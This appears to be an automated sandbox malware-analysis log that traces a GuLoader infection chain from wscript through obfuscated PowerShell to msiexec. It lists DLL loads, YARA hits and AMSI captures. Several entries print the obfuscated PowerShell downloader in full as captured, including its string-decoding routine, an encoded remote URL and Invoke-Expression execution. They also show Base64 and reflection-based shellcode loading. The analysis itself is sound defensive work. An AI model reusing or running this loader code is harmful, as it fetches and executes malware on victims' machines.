Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Rastafarian Reservoiret spermatopho", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.1681623688.0000000009456000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1661877856.000000000601E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Misanalyzed $diemagstrberiske $Meis), (Primitivest @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hustelefonnumrets = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retrospektionen)), $Pie).DefineDynamicModule($Observing, $false).DefineType($Svarskrift, $Relevans, [System.MulticastDelegate])$Presti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

11_2_004044A4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04C235F7 push eax; retn 07B5h	4_2_04C23639
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20902806 push ecx; ret	7_2_20902819
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044693D push ecx; ret	11_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044DB70 push eax; ret	11_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044DB70 push eax; ret	11_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00451D54 push eax; ret	11_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0044B090 push eax; ret	12_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0044B090 push eax; ret	12_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00451D34 push eax; ret	12_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00444E71 push ecx; ret	12_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00414060 push eax; ret	13_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00414060 push eax; ret	13_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00414039 push ecx; ret	13_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004164EB push 0000006Ah; retf	13_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00416553 push 0000006Ah; retf	13_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00416555 push 0000006Ah; retf	13_2_004165C4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_004047CB

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
